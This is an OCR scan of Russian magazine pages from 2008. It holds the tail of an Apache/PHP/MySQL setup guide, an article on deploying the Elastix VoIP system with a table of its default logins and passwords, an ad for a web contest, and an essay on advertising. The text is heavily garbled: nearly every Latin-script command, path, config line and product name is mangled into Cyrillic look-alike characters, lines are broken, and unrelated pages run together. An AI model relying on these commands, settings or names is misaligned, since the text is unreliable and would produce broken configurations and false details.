\ ргосз_ргіѵ 
*аЫез_ргіѵ 
*іте_20пе 

*іте_ 2 опе_‘Іеар_зесопсІ 
*іте_20пе_пате 
І *іте_20пе_*гапзі*іоп 
: *іте_20пе_*гапзі*іоп_*уре 
\ изег 

-|- - у. 



Орбіопз Іпбехез РоІІоотЗутЬіпкз МиІбіѴіемз 
АІІоѵЮѵеггібе Ыопе 
Огбег а11сж,бепу 
аіісж ігот аіі 
</БігесЬогу> 

# Для ССІ-скриптов 

ЗсгірбАІіаз /сді-Ьіп/ /изг/ІіЬ/сді-Ьіп/ 

<БігесДогу " /изг/ІіЬ/зегѵег . сот/ сді-Ьіп" > 
АІІоѵЮѵеггібе Ыопе 

Орбіопз +ЕхесССІ -МиІбіѴіемз +8утЬіпкзІі0шіегМаДсЬ 
Огбег аііотлг, бепу 
АІІсж ігот аіі 
</ВігесЬогу> 

# Журналирование событий 
ЕггогЬод /ѵаг/1од/арасЬе2 /еггог . Іод 
ЬодЬеѵеІ магп 

СизботЬод /ѵаг/1од/арасЬе2 /ассезз . Іод 
ЗегѵегЗідпабиге Оп 
</ѴігбиаІНозб> 

Смотрим, с правами какого пользователя работает веб-сервер (в ІІЬипІи 
эти данные вынесены в отдельный файл): 



$ саі /еІс/арасИе2/епѵѵаг5 

ехрогб АРАСНЕ_КШ_и8ЕК=ѵуѵуѵ\/-баЬа 
ехрогб АРАСНЕ_КІІЫ_СКОІІР=ілПлм-баба 

Создаем каталог, в котором будут находиться файлы сервера, устанавли- 
ваем его владельцем учетную запись ѵ\лллл/-сІаІа и включаем новый сайт: 

$ зибо ткбіг /ѵаг/ѵ^лпл/зегѵег . сот 

$ зибо сЬоѵт ѵллпл-баба : ѵллпл-баба /ѵаг/шш/вегѵег . сот 
$ зибо а2епзібе зегѵег.сот 

При необходимости заносим данные об имени компьютера в /еіс/Ьозіз, 
перезапускаем веб-сервер и пробуем зайти на зегѵег.сот . 

ЗАКЛЮЧЕНИЕ 

Мы получили полностью работоспособный веб-сервер с поддержкой РНР 
и Му5С11_, который можно использовать для хостинга, биллинга, форума 
или при разработке скриптов. Схему можно расширять: настроить подде- 
ржку 556 и квот, задействовать МосІЗесигТудля защиты веб-приложений 
как от известных, так и еще неизвестных атак, установить ѴѴеЬаІігег или 
АѴѴЗіаІздля сбора и визуализации статистики. Тем, у кого мало опыта ра- 
боты с МуЗОб, не помешает веб-интерфейс рбрМуАбтіп. Неплохо за реко- 
мендовал себя и ѴѴеЬтіп, позволяющий управлять всеми компонентами 
І_АМР при помощи локализованного веб-интерфейса. И-И 
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СЕРГЕИ «ОВІШЕП» ЯРЕМЧУК 

/ СШЫОЕП@ІІА.ГМ / 



1І.А5ТІХ: ГИБРИДНОЕ РЕШЕНИЕ ДЛЯ БЫСТРОГО И ПРОСТОГО РАЗВЕРТЫВАНИЯ ѴОІР-ТЕЛЕФОНИИ 



.Создание своего ѴоІР-сервиса с использованием свободных компонентов 



■дело дал еко не простое. Администратору требуется знать не только осно- 
юты с *піх-системами, но и специфику ѴоІР и конкретных программ. 
ючем, за дачу можно упростить, если обратиться к специализированным 
)ешениям. 



МУКИ ВЫБОРА 

Использование стандартного дистрибутива І_іпих, пусть даже хорошо из- 
вестного администратору, имеетсвои слабые стороны. В пакетных репози- 
тариях сегодня редко встретишь полный набор необходимых программ (да 
еще и последних версий], а значит, все придется собирать, устанавливать и 
обновлять вручную. Это займет много времени и сил, ведь кроме системы, 
зависимостей, Азіегізк и драйверов коборудованиюѴоІР, придется разби- 
раться с установкой веб-интерфейса, системы учета звонков и т.д. Специ- 
ализированное решение не требует глубоких знаний (хотя они и приветс- 
твуются], — настройки просты и понятны любому, кто хорошо представляет 
конечный результат. Разработчики обычно сами следятза новинками ПО и 
предлагаютобновления при помощи собственных репозитариев. 

На сегодняшний день уже имеется несколько подобных решений. Так, 
Оідіит (компания-разработчик Азіегізк] предлагает свой вариант — дис- 



трибутив АзІегізкМОѴѴ ( ѵѵѵѵѵѵ.азіюгізкпоѵѵ.огд ]. Последняя стабильная вер- 
сия 1.0.2 построена на основе одноименного веб-интерфейса и системы 
сборки гВиіЫег Опііпе дистрибутива гРаіЬ І_іпих ( граРі.сот ]. Собс- 
твенно, веб-интерфейс АзіегізкІХОѴѴ, используемый в этом дистрибутиве, 
находится в стадии активной разработки, и многие необходимые функции 
отсутствуют. С его помощью можно выполнитьлишь ряд базовых операций 
настройки сервиса ѴоІР и ничего более. Вероятно, потому что его возмож- 
ности сильно уступают аналогичным решениям сторонних разработчиков, 
в новом релизе будет добавлен РгееРВХ (интерфейс для удобного конфигу- 
рирования Азіегізк, у\ ], который и будет использоваться по 

умолчанию. Следующий кандидат — ТгіхЬох ( ѵѵѵѵѵѵТгіхЬох.огд ] — доступен в 
двух вариантах: коммерческом (Рго) и свободном — ТгіхЬох СЕ (СоттипТу 
ЕбіЬоп]. Создан он на базе компонентов ЬААМР (Ыпих, АрасЬе, Азіегізк, 
МуЭСИ и РНР), и в качестве интерфейса управления предложен РгееРВХ 
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Инсталлятор Апасопсіа в Еіазііх 











Дополнительные функции (например, сервер е-таіі) делают Еіазбх еще более привле- 
кательным 



Информация о системе 



* 



с некоторыми собственными модулями. Удобен он тем, что 
в нем изначально присутствует система биллинга и панель 
оператора (РІазЬ 0 регаІогРапеІ). Текущая версия базируется 
на СепЮБб.І. Чтобы получить доступ к репозитарию пакетов, 
следует зарегистрироваться на сайте разработчика. Только 
после этого можно будет установить такие приложения, 
как ЗаЫэег и ЗидагСРМ. На использование во встроенных 
устройствах (СРИ — 200 МГц, РАМ — 64 Мб] ориентирован 
АзкогіаРВХ ( ѵѵѵѵѵѵ.азкогіа.со ], базирующийся на тОпОѵѵаЦ 
(РгееВЗО 6.2] и Азіегізк 1 .4. В качестве интерфейса исполь- 
зован несколько переработанный АзІегізкЫОѴѴ. Кстати, име- 
ются и русифицированные модули голосовых сообщений. 

ВЫБОР СДЕЛАН 

После анализа всех предложений был выбран ЕІазОх [ еіазііх. 
огд ]. В настоящее время он является наиболее оснащенным и 
удобным в работе решением. Используя ЕІазОх, можносоздать 
нетолько полнофункциональный ѴоІР-сервис, но и некоторые 
другие сервисы обмена информацией. В стандартную постав- 
ку, кроме І_АМР, входят: РозіТіх и Сугиз-ІМАР, почтовый веб- 
интерфейс РоипсІСиЬеМаіІ, ЗаЫэег-сервер ОрепРіге, факс- 
сервер НуІаРах, две СПМ-системы (Сизіотег РеІабопзЬір 
Мападетепр управление взаимоотношениями с клиентами] 
— ЗидагСРМ и ѴТідегСРМ, система биллинга А2ВіШпд, сер- 
вер ОНСР и многие другие компоненты. Для настроек всех этих 
функций используется понятный веб-интерейс собственной 
разработки. Причем, в отличие от других дистрибутивов, в 
ЕІазГіх интерфейс изначально локализован. 

Еіазбх построен на СепЮЗ 5, с которым он полностью совмес- 
тим по пакетам. Разработчики дополнили стандартный Азіегіз к 
собственными утилитами и модулями сторонних производи- 
телей. Отмечается, что дистрибутив оптимизирован с учетом 
возможной работы на виртуальных машинах вроде ѴіііиаІВох, 
ѴМѴѴаге или ХЕІ\і. Распространяется все это дело по лицензии 
6І\ІІ) 6РІ_. 

УСТАНОВКА ЕІ.А5ТІХ 

Период детских болезней (багов, тобишьідля Вазбх миновал. 
Последней актуальной версией является 1.3, которую можно 



получить по ссылкам на странице Ооѵѵпіоасіз. Отдельно пред- 
ложен образ для ѴМѴѴаге. Кроме того, в ТооІ5 находим образ 
СепІо052ЕІа5Ііх, позволяющий превратить СепЮЗ в Еіазбх. 
Программа установки Апасопсіа полностью совпадает с инс- 
таллятором популярного дистрибутива ПебНаІ: Ыпих, от кото- 
рого, собственно, и произошел СепЮЗ. Поэтому все руководс- 
тва для любого из этих дистрибутивов будут действительны. 
Для примера можно почитатьдокументацию, расположенную 
по адресу ѵѵѵѵѵѵ.гіісі.ги/сіосз/ппапиаіз/епіегргізе . Ксожалению, 
четкие указан ия насчетап па ратных средств дать невозможно, 
слишком много здесь тонкостей и нюансов. Поэтому за при- 
мерными конфигурациями компьютеров отсылаю на страни- 
цу сайта ѵоір.гиз.пеі «Производительность АзЮгіз к- систем» 
( ѵоір.ги5.пеѴі:ікі-іпсІех.рЬр?раде=А5І:егІ5к+сІітеп5Іопіпд ]. 

В зависимости от планируемой нагрузки выбери наиболее 
близкий вариант(хотя это тоже недогма]. Разработчики упрос- 
тили процессустановки Еіазбхза счетиспользования файлов 
автоматизации КіскЗіагЕ В 150-образе таких файлов три. В 
обычном варианте установки администратору будет задано 
всего лишь несколько вопросов: клавиатурная раскладка, 
часовой пояс, пароль суперпользователя гооЕ Под систему 
отводится жесткий диск целиком, и все необходимые разделы 
будут созданы автоматически. Также без лишнихзапросовус- 
танавливаются пакеты. Сетевые интерфейсы настраиваются 
на получение ІР-адреса от ОНСР-сервера. Нажав клавиши 
от <Р1 > до <Р5>, можно получить справку по дополнительным 
параметрам. Сам процессустановки происходит в псевдогра- 
фическом режиме, перемещение между элементами произ- 
водится при помощи стрелоки клавишитабуляции. Выбор или 
отмена выбора нужного пункта — <Пробел> или <Еп1:ег>. 
Несколько больше свободы предоставляет вариант 
АбѵапсесІ, активируемый вводом в загрузочном меню па- 
раметра «абѵапсесі». Здесь уже возможна ручная разметка 
диска и настройка сетевых интерфейсов. 

После перезагрузки система полностью готова к настройкам 
сервисов через веб-интерфейс. Регистрация в консоли мо- 
жет понадобиться только в том случае, когда сетевой интер- 
фейс не сконфигурирован при установке. Для его настройки 
следует вызвать программу пеЮопбд и в появившемся окне 




> ѵѵагпіпд 

Флажок напротив 
«АІІоѵѵ Апопутоиз 
ІпЬоипсІ 5ІР СаІІБ?» 
должен быть 
установлен в «N 0 », 
иначе любой поль- 
зователь сможет 
подключиться к сер- 
веру и осуществлять 
звонки. 
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Список логинов 
и паролей по умолча- 
нию к сервисам Еіазгіх 



Интерфейс Логин Пароль 

Еіазбх асітіп раіозапф 

ІгееРВХ асітіп асітіп 

РІазЬ Орегаіог Рапеі асітіп еБа511х.2оо7 
СаШпд Сагсіз асітіп тураззѵѵогсі 

ЗидагСРМ асітіп раззѵѵогсі 

ѵТідег асітіп асітіп 

ОрепРіге асітіп Указывается во время настройки сервиса 

РоипсІСиЬеМаіІ В виде изег.сіотаіп.сот 

Указывается при создании новой записи 
МуЗОБ гооі еБа5іІх.2оо7 




> ІП^О 

• РІазЬ Орегаіог Рапеі 
позволяет наблю- 
дать за активностью 
Азіегізк в реальном 
времени, отслеживать 
активность абонентов, 
управлять соедине- 
ниями с помощью 
простых операций, 
просматривать статус, 
прослушивать и 
прерывать звонки и 
многое другое. 

• Поумолчанию в 
настройках клиента 
голосовая почта 
отключена. 

• Настройка Азіегізк 
детально освещена 
в статьях «Строим 
телефонную сеть» (Х_ 

1 1_2007), «Под знаком 
ѴоІР» Ьс_1 2_2007), 
«ѴоІР особого назна- 
чения» [ ~г 01 2ПП8І. 
«Звездные счета» 
Ь-С_02_2008]. 



заполнить нужные параметры. Удаленное управление с ис- 
пользованием консоли выполняется по протоколу 55Н (в 
комплект ЕІазГх входит 0реп55Н-сервер]. 

ЗНАКОМСТВО С ВЕБ-ИНТЕРФЕЙСОМ 

Теперьможно подключаться квеб-интерфейсу, для чего вво- 
дим вбраузере ІР-адрессервера. Для регистрации использу- 
ем учетную запись «асітіп» и пароль «раіозапіо». Поумолча- 
ниюустановлен английский язык интерфейса. Для смены на 
русский переходим в мен юЗузІет -> РгеІегепсез-^Бапдиаде. 
Пока интерфейспереведенлишьчастично. Крометого, всоз- 
даваемых графиках иногда появляется нечитаемый текст. В 
целях безопасности следует изменить пароль администра- 
тора. Это можно сделать в Система -> Пользователи, затем 
выбрать в меню слева ІІзегз, отметить учетную записьасітіп 
и нажать кнопку «Редактировать». 

Веб-интерфейс состоит из семи основных вкладок. Их на- 
звания вполне отвечают назначению, поэтому разобраться 
легко. Внутри основных вкладок есть подменю, где можно 
получить доступ к конкретным настройкам. 

Во вкладке «Система»также можно активировать и настроить 
встроенный ОНСР-сервер, создать группы и наделитьихпра- 
вами. Группа, к которой принадлежит пользователь, задается 
п ри создан и иучетной записи ; впоследствии труп пул егко сме- 
нить. Пользователь может быть членом только одной группы. 
В других подменю находятся пункты, позволяющие — загру- 
зить модуль, найти оборудование, завершить работу системы, 
обновить пакеты, произвести резервирование и восстанов- 
ление системы. Файл с именем еіазбхбаскир-дата*, содер- 
жащий резервную копию, помещается в каталог /ѵаг /шт/ 
ЬДшІ/Ьаскир. Настройка почтового сервера, учетных запи- 
сей и перенаправление почты производится в меню Етаіі. 
Здесь же находится подменю для доступа к РоипсІСиЬеМаіІ. 
Аналогично, все настройки ОрепЕіге собраны в меню ІМ. По 
умолчанию этот сервис неактивен. После нажатия на ссылку 
запустится мастер настройки сервиса, и в дальнейшем работа 
с ОрепРіге — стандартна. Меню «Отчеты» полностью отвечает 
своему названию. Здесь можно узнать статистику звонков и 
использования каналов. Подменю «Биллинг» содержит до- 
полнительные пункты, в которыхуказываются тарифные пла- 
ны и различные отчеты. В меню «Дополнительно» находятся 
пункты для доступа кЗидагСРМ, ѴТідегСВМ и платформе для 




работы с карточками. В подменю «Загрузки» разработчики 
собрали ссылки на протестированные и рекомендуемые для 
совместного использования с Еіазбх приложения (софтфоны, 
ІМ-клиенты и факс-утилиты). 

Настройки виртуальных факсов производятся в меню «Фа кс». 
Здесь же указывается электронный адрес, на который будут 
отсылаться сообщения о получении нового факса. Реализо- 
ван поиск по принятым сообщениям. Зайдя вТетрІа1:е Етаіі, 
следует установить шаблон сообщения, используемого при 
отправке факса. Среди документации на сайте проекта есть 
три видеоурока, где показано, какнастроить НуІаРах и отпра- 
вить сообщение с клиентского компьютера. 

Учитывая, что большая часть сервисов уже работает после 
установки, можно сразу приступать к настройкам. 

НАСТРОЙКА 5ІР-АККАУНТА 

Все связанное с настройками Азіегізк размещено во вклад- 
ке РВХ. При необходимости, выбрав «ІІпетЬесІсІесІ ігееРВХ», 
можно вместо инструментов, предлагаемых ЕІазГх, перейти 
на интерфейс РгееРВХ. Доступ к СЫ Азіегізк находится в 
подменю «Командная строка Азіегізк». Для болеетонкой на- 
стройки возможна и ручная правка конфигурационных фай- 
лов Азіегізк. Для примера рассмотрим создание нового 5ІР- 
аккаунта. В «6епега15е1:бпд»указываются общие настройки. 
Например, в «Азіегізк Біаі соттапб орбопз» по умолчанию 
установлено«1:г», что означает разрешение передачи вызова 
вызываемой стороной по нажатию «#» и обычные гудки. За- 
писав вместо «г» букву «т», можно заменить гудки приятной 
музыкой (МизісОпНоІсІ). Она будет сопровождать абонента, 
пока ему не ответят. В этом же меню настраивается формат 
времени, страна и почтовые адреса для отправки факсов. 
Проследи, чтобы флажокнап роти в«АІІоѵѵАпопутоизІпЬоипсІ 
5ІР Саііз?» был установлен в «І\Іо», иначе любой пользова- 
тель сможет подключиться к серверу и нагло осуществлять 
звонки. Теперь переходим в подменю «Конфигурирование 
УАТС» и в раскрывающемся списке «йеѵісе» выбираем тип 
устройства. Для софтфона это будет «Оепегіс 51 Р Беѵісе», 
хотя некоторые реализации поддерживают и протокол ІАХ2. 
После нажатия на кнопку «ЗиЬтіІ» появится окно, в котором 
указываем параметры нового клиента. Все поля заполнять 
не требуется, всегда можно вернуться и подкорректировать 
настройки. Обрати внимание на подсказки, появляющиеся 
при наведении курсора на некоторые параметры. В поле 
«ІІзег Ехіепзіоп» вводим номер абонента, в «Бізріау ІМате» 
— имя, выводимое при звонке. В поле «зесгеі» указывается 
парольдля доступа кномеру, а для софтовыхтелефонов здесь 
можно использовать и буквенно-цифровую комбинацию. 
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» ХАКЕР.РВ 




В ТгіЬох СЕ в качестве интерфейса используется РгееРВХ 



Возможность проведения конференции поумолчанию отключена. Для ее 



ШіХ 



СгаЬсх КедіЯгайоп 



Настройки параметров 5ІР 



активации и настройки перейди в подменю Сопіегепсе. 



После заполнения нужных полей нажимаем «ЗиЬтіІ». Новая учетная 
запись должна появиться в поле справа. Если новые настройки требуют 
перезапуска Азіегізк, в верхней части окна появляется надпись «Арріу 
Сопіідигаііоп СЬапдез Неге» на красном фоне. Нажимаем на нее и про- 
буем подключиться клиентом. Поумолчанию в настройках клиента голо- 
совая почта отключена. Для ее активации нужно перейти в поле «Ѵоісетаіі 
& Оігесіогу» и установить значение «Зіаіиз» в «ЕпаЫе». Для доступа к го- 
лосовой почте в «Ѵоісетаіі РаззѵѵогсІ» введи пароль (пользователь затем 
может его изменить, зайдя в меню «*98»]. Так как пользователь будет наби- 
рать пассворд, используя кнопки телефона, пароль должен состоять только 
из цифр. Чтобы получать сообщения о наличии голосовой почты на е-таіі, 
надо ввести адрес в поле «Етаіі Асісігезз» и «Радег Етаіі Асісігезз». В пос- 
леднем указывается номер для отправки коротких сообщений в виде 5М5. 
При помощи нескольких переключателей указываются дополнительные 
возможности. Например, установка «Етаіі Аііасбтепі» в «уез» разрешит 
отправку голосового сообщения в качестве почтового вложения. 

После того, как будет разрешен ѴоісеМаіІ, появятся дополнительные 
меню. В «ВаЬсазІ Сопіідигаііоп» настраивается запись переговоров в 
ѵѵѵѵѵѵ.даЬсазІ.сот (для чего нужна действующая учетная запись на этом 
сервисе — бесплатно предоставляется до 200 Мб места под запись). В 
«АсМ Роііоѵѵ Ме ЗеШпдз» указывается список альтернативных номеров 
и алгоритм их выбора в том случае, если абонент не отвечает на звонок. 
Окончательное решение по неотвеченному звонку указывается в поле 
«Оезііпаііоп іі по апзѵѵег». Здесь можно положить трубку, перенаправить 
звонок другому абоненту, записать сообщение или выпол нить любую дру- 
гую команду Азіегізк. Специальные номера, используемые в Еіазііхдля 
доступа к голосовой почте, парковки и записи вызова, настраиваются в 
«Реаіиге Сосіез». Перед созданием номеров ознакомься с имеющимися 
здесь установками, чтобы не использовать зарезервированные номе- 
ра. Описание номера для доступа к голосовой почте находится в поле 
«ѴоісеМаіІ». В нашем случае — это «*98». Набираем его втелефоне, вво- 
дим свой номер и пароль для доступа к голосовой почте. Другой способ 
прослушать оставленное сообщение: воспользоваться веб-интерфей- 
сом РВХ — «Голосовая почта». Но чтобы пользователь смог в нем заре- 
гистрироваться, сначала следует перейти в Система Пользователи и 
создать новую системную учетную запись. Номер телефона, который бу- 
дет привязан к этому пользователю, указывается в поле «Ехіепзіоп». 
Еіазііх предоставляет еще однуудобную функцию — сканирование выбран- 
ного диапазона ІР-адресов для поиска клиентов. Администратор в ответ на 
запрос в подменю «Епфоіпі Сопіідигаііоп» получает список абонентов с 
указанием их ІР- и МАС-адресов, номеров, типовтелефонов и статуса. 



ПОДКЛЮЧЕНИЕ ВНЕШНИХ КАНАЛОВ 

Теперь, когда пользователи могутобщаться междусобой внутри дома/уни- 
вера/офиса, перейдем к настройке внешних соединений. Поддерживае- 
мые интерфейсные карты обнаруживаются автоматически. Для проверки 
следует перейти в Система Обнаружение оборудования. Если в списке 
нет нужного устройства, нажми кнопку «Сканировать оборудование». С 
картами-клонами Х100Р ( ѵѵѵѵѵѵ.ѵоір-іпІо.огд/ѵѵікі/ѵіеѵѵ/ХІ ООР+сІопе ]. как 
правило, проблем не возникает. Настройка внешних каналов произ- 
водится в подменю «Тгипк». Под термин «канал» в Азіегізк попадает 
как ѴоІР-провайдер, так и канал, предоставляемый интерфейсной 
картой. Это и предстоит выбрать на первом шаге мастера. Далее за- 
полняем параметры. В «ОиіЬоипсІ Саііег Ю» записываем Саііег Ю, 
который будет отправлен удаленному абоненту при исходящем вызо- 
ве по этому каналу. Поле имени для Саііег Ю указывается в двойных 
кавычках, а поле номера — внутри символов <> («5егдер> < 1 2345 > ) . 
Указав число в поле «Махітит сбаппеіз», можно ограничить количество 
одновременныхзвонков, совершаемых по этому каналу. В поле«0іаІРиІез» 
заносится план наборадля исходящихномеров. В Еіазііхприсоздании шаб- 
лонов плана набора помогает мастер, позволяющий быстро добавить нуж- 
ную запись. Чуть ниже, в «Тгипк Ыате», указываем уникальное имя канала, 
— оно будет использовано в правилах Азіегізк. В «Оиідоіпд ЗеШпдз» про- 
писываются параметры ѴоІР-провайдера. В общем случае необходимо под- 
править за готовку, изменив поля созвездочками нужными значениями: 

Тюз1і=В№ имя или ІР-адрес провайдера 

из егпате= логин 

зесгеД=пароль 

Цуре=реег 

Последний параметр означает, что канал будет использован для ис- 
ходящих звонков. Входящие звонки настраиваются в поле Іпсотіпд 
ЗеШпдз. Дополнительно можно указать предпочтения для кодеков и 
прочие параметры. Всеони подробно описаны в документации Азіегізк. 
Большинство провайдеровтребуютрегистрации на сервисе. Необходи- 
мую строкууказываем в « Ред ізіег ЗГгі пд ». Форматеетаков: «изегпаше : 
раззмогсШѵоірргоѵісІег . сот/ІШ». Поокончании настроекнажима- 
ем «ЗиЬтіІ СЬапдез» и перезапускаем Азіегізк. 

В итоге мы получили аналог АТС, при помощи которой можно совершать 
звонки как внутри дома/универа/офиса, так и на внешние номера. Но это 
еще далеко не все возможности, предоставляемые Азіегізк/Еіазііх. Также 
доступны парковка вызова, использование агентов, конференции, бил- 
линг, факс и многое другое. Слава техническому прогрессу! НС 



► ізо 



ХАКЕР 12 / 120 / 08 




реклама 







(дате)іамі 

ОРГАНИЗАТОР 



Первый в России конкурс 
ѵѵеЬ-проектов среди энтузиастов 

Во все времена самые прекрасные шедевры создавались энтузиастами. Ведь это 
люди, которые делают своё любимое дело - не ради зарплаты и не для начальства, 
а ради себя и для таких же, как они - -Гог епІГіизіазІз Ьу епШизіазІз. Каждый из 
них смотрит на Мир своими глазами и хочет донести до остальных свой взгляд - 
свои мысли и эмоции. Никто и никогда не сделает дело так хорошо, как человек, 
который искренне и безвозмездно живёт им. Эти люди делают нашу жизнь ярче и 
интересней, они стирают границы и рушат стереотипы. Мы поддерживаем их уже 
более 16 лет. Теперь для этого существует ЕпІГіизіазІ Іпіегпеі АѵѵагсІ. 






ЕЫТНІІЗІА5Т 

ІІЧТЕКЫЕТ 

АѴѴАРЮ 

2008 




О К I. I С К 



СПОНСОР КАТЕГОРИИ АВТО 



СПОНСОР КАТЕГОРИИ САМІГ\ІС 











Н УЗНАТЬ ВРАГА В ЛИЦО 

Реклама — лишь часть мощного маркетингового комплекса, обеспе- 
чивающего продвижениетовара на рынок. В чистом виде реклама уже 
давно замкнулась сама на себя. Сначала это были просто небрежные 
строчки «здесь могла бы быть ваша реклама», затем появилась рек- 
лама, рекламирующая рекламу, а когда финансовый поток от продажи 
рекламных мест стал иссякать, пришлось запускать рекламу, реклами- 
рующую рекламу, рекламирующую рекламу — и так далее... 
Пикантность ситуации в том, что в отрыве от маркетингового контекста 
реклама превращается в объект искусства, вполне окейный такой 
объект. Когда был жив вражий «Голос Америки», старательно заглу- 
шаемый нашими спецслужбами, чтобы народ не слушал заграницу, 
молодежь назло судьбе отращивала хаир, ловила радиоволны, приле- 
тевшие из далекой и загадочной земли, и записывала на магнитофон 
танцевальные ритмы рекламы зубной пасты. Ну, это для американцев 
она была рекламой, а для жителей бывшего СССР вполне сходила за 
метал. И дело здесь отнюдь не в языковом барьере. Рекламутогда слу- 
шали и те, кто врубался в смысл, но вместо раздражения ловил кайф. 
Негативное отношение к рекламе на 90% обуславливается пред- 



рассудками, а не ее содержимым. Фотография красивой девушки, 
измазанной шоколадом (йогуртом, мороженым, моторным маслом), 
вызывает возбуждение, но если это моторное масло отфирмы «Моно- 
полис», то волна возбуждения сметается вихрем посторонних мыслей: 
«какая тупая реклама! лучше бы о масле пару слов сказали», «девуш- 
ка, конечно, первый сорт, а это масло я из принципа теперь не буду 
покупать». 

Чем меньше реклама похожа на рекламу, тем меньше негатива она 
вызывает и тем больше соблазняет людей. Было бы наивно думать, 
что маркетологи сего не знают и верят в рекламу, как в самих себя. 
Способность рекламы подстегивать продажи, вообще говоря, сильно 
преувеличена, а если из обозначенных доходов вычесть расходы на 
саму рекламу, то ее рентабельность вообще свалится в плоский што- 
пор, упасть в который, как известно, намного проще, чем выбраться 
обратно. 

Рекламодатели отэтого страдают еще больше, чем пресловутая 
целевая аудитория. Примеров «работающей» рекламы не существует, 
а те, что приводятся в учебниках по маркетингу, только для учебников 
и годятся, поскольку рекламируютуспешные коммерческие продукты, 
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ипі*5 



Любуясь шикарной красоткой, мы не замечаем гориллу, отраженную в 
еркале 



■ игинальная реклама маркеров 



захватившие рынок благодаря грамотному маркетингу. Их реклама (за 
редкими исключениями, которыетолько подтверждают правило) не 
несла в себе ничего новаторского. У конкурентов была ничуть не хуже, 
а зачастую даже лучше, но... 

Ага, вотуже и первые несогласные. Вы из какого рекламного агентст- 
ва? Вот только не надо размахивать ворохом распечаток с откровенно 
левыми данными, выдаваемыми за масштабное социологическое 
исследование. Рекламировать рекламу (свою, разумеется) вы кому- 
нибудь другому будете, а здесь вам не тут! Допустим, что я не прав, и 
хорошая реклама — залог успешной торговли. Тогда возникает воп- 
рос: зачем тратить огромные деньги на исследования и производство? 
Не проще ли их вложить в рекламу, продавая воздух по цене квартир в 
Москве? 

Какие бы деньги ни вкладывались в рекламу — долго впаривать фуфло 
не получится. Во всяком случае, если реклама будетявной. Вроде 
ролика с девушкой, измазанной маслом. Потребитель ведь не дурак и 
понимает, что девушка — это одно, а масло — совсем другое. Рекламо- 
дателитоже недураки, но... весь фокус втом, что реклама уже давно не 
рекламируеттовары. Реклама рекламирует рекламу. И производители 
масла — такая же жертва обмана, как и конечные потребители. 
Классическая схема, описанная в учебниках по маркетингу, в которой 
производитель масла с производителем рекламы промывают мозги 
конечным потребителям, только в учебниках и встречается. В реаль- 
ной жизни производитель рекламы промывает мозги производителю 
масла, создавая такую рекламу, которая понравится масляному маг- 
нату. Что же касается народных масс, их вообще-то никто спрашивать 
не собирается. Народные массы — они ведь рекламные концепты 
рубят только так, ищи потом творческое вдохновение. Причем, рубят в 
основномто, к чему неравнодушны. 

Разговоры о необходимости запрета рекламы идут уже не первый год, 
а воз, как говорится, и нынетам. А все потому, что в рекламе крутятся 



Реклама ЗМ — фирмы по произ- 
водству пуленепробиваемого 
стекла. Деньги лежат настоящие, 
и, чтобы никто не разворотил 
рекламный стенд, рядом дежурит 
полицейский 



нехилые деньги, отказываться от которых никто не собирается, даже 
если ситуация доходит до абсурда, и продукты одной и той же фирмы 
начинают конкурировать между собой, что указывает на отвратитель- 
ный маркетинг. Кстати, о маркетинге... 

г НЕЛИНЕЙНЫЕ УРАВНЕНИЯ 

О К, мы выяснили, что видеоролик с красивой девушкой, измазанной 
машинным маслом, имеет хорошие шансы стать хитом, но желания 
купить вагон этого масла в отсутствие аналогичной девушки ни у кого 
не возникает. При прочих равных автолюбители отдают предпочтение 
более качественному, дешевому, доступному маслу, и никакая реклама 
не заставит их заливать в двигатель гадость, потому как двигатель 
стоит дорого, а угробить его проще простого. 

Выходит, что реклама не работает? Не будем торопиться! Реклама ра- 
ботает, но нетаклинейно. Оставим в покое девушку, зальем дешевое 
масло в стильную тару, прицепим солидную голографическую этикетку 
и выпустим кучу стикеров, чтобы все видели, что рядом с нами едет ма- 
шина, заправленная маслом «Гуталин». Уже смешно? Тогда как можно 
объяснить тот факт, что на половине компьютеров красуется логотип 
«Іпіеі Іпзісіе»? 

Рекламировать микропроцессоры впервые начала фирма I піеі. До 
этого рекламировалисьтолько компьютеры целиком, — что логично, 
ибо выбирать процессор должны инженеры, а не домохозяйки. Инже- 
нер (если это, конечно, инженер, а не выпускник ПТУ под названием 
ВУЗ) знает, что производительность — это одно, а мегагерцы — сов- 
сем другое, особенно если сравниваются процессоры с непохожими 
архитектурами. Сделав ставку на домохозяек, I піеі долгое время 
успешно продавала мегагерцы, которыху нее было больше, чем у АМй. 
Фактически, это самый настоящий развод. Потребители совершают 
неоптимальную покупку, приобретая мегагерцы, которых и руками не 
пощупать, и на зуб не попробовать. 

Впрочем, АМ Б тоже хороша. Создала (и ведь не сама создала, а, как 
всегда, скупила) процессоры с ВІЗС-ядром и тутже начала бить себя 
пяткой в грудь: мол, у нее это есть, а у I пііеі нет. Народ, естественно, 
повелся и набросился на высокотехнологичный РІ5С, даже не спросив 
себя: «а зачем?». Микроархитектура процессора к потребительским 
характеристикам не относится. Это ведь не цена, не производитель- 
ность и даже не надежность. Это просто особенность реализации. 
Технически, создать быстродействующий процессор с ВІЭС-ядром 
проще, но... само по себе ВІЗС-ядро не есть преимущество. 

Другой пример. Браузер С б готе от Ооодіе, обеспечивающий (как 
сказано в его описании) более безопасный серфинг. Вменяемый пот- 
ребительуже должен насторожиться и спросить: более безопасный по 
сравнению с чем?! К тому же, как нельзя быть «чуть-чуть беременной», 
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так и нельзя говорить о более и менее безопасных про- 
граммных продуктах. Достаточно всего одной дыры, чтобы 
атаковать систему, не говоря уже о том, что «безопас- 
ность» — это не потребительская характеристика. Ладно, 
оставим программное обеспечение и возьмем самолеты. 
Полет по графику, сервис на борту — это все радует, но 
если одна компания («Сибирь») кормит офигенными 
курочками, а другая («Аэрофлот») жмется на второй кусо- 
чек колбаски, отрезанный лазерным ножом с контролем 
толщины по микрометру (чтобы не отрезать лишнего), то 
всем понятно, что курица рвет колбасу как туз и к грелку. 

А вот о безопасности такого сказать нельзя. Авиака- 
тастрофы случаются редко, причем им подвержены все 
компании без исключения. Легенда отом, что бюджетные 
компании, у которых нет денег на нормальный ремонт са- 
молетов, намного более опасны, чем компании, дерущие 
с пассажиров три цены, легко опровергается статистикой. 
Крупнейшие авиакатастрофы происходили и происходят 
с респектабельными авиакомпаниями типа КИМ, тогда 
как«бюджетники»типа АігАзіа летают себе и не падают, а 
если и падают, то не чаще других. 

А вот еще один пример — іРЬопе, повальное увлечение 
которым совершенно необъяснимо с позиций рациональ- 
ного мышления. Перефразируя крылатые слова, можно 
сказать: покупая іРЬопе, мы приобретаем нетелефон, а 
уверенность в себе, потому как позволить себе эту штуку 
можеттолько человек, чего-то достигший в жизни и 
